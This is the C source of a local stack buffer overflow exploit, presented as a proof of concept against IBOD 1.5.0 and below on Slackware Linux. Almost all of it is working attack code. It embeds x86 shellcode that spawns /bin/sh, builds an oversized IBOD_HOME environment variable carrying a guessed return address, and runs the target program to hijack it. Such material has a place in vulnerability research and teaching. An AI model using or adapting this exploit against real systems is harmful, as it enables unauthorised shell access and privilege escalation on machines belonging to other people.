IBOD 1.5.0 and below local proof of concept buffer overflow exploit.
9a604874ed4c3a5442bb00dbf27ccce5d305c9bfed784c062e3cd4b3737e97fb
/* ibod_bof.c
*
* IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
*
* Tested in Slackware Linux 10.0
*
* by CoKi <coki@nosystem.com.ar>
* No System Group - https://www.nosystem.com.ar
*/
#include <stdio.h>
#include <strings.h>
#define BUFFER 540 + 4
char shellcode[]=
"\x31\xc0" /* xor %eax,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* push %edx */
"\x53" /* push %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */
void use(char *program);
int main(int argc, char *argv[]) {
FILE *file;
char buf[BUFFER], *path, tmp[BUFFER];
char *buffer=buf;
int ret;
if(argc != 2) use(argv[0]);
path = argv[1];
if((file = fopen(path, "r")) == NULL) {
printf(" Failed to open file!\n");
exit(1);
}
ret = 0xbffffffa - strlen(shellcode) - strlen(path);
bzero(buf, sizeof(buf));
memset(buffer, 'A', BUFFER-4);
sprintf(tmp, "%s", &ret);
strncat(buf, tmp, 4);
printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");
setenv("IBOD_HOME", buf, 1);
setenv("SHELLCODE", shellcode, 1);
execl(path, path, NULL);
}
void use(char *program) {
printf(" Use: %s <path>\n", program);
exit(1);
}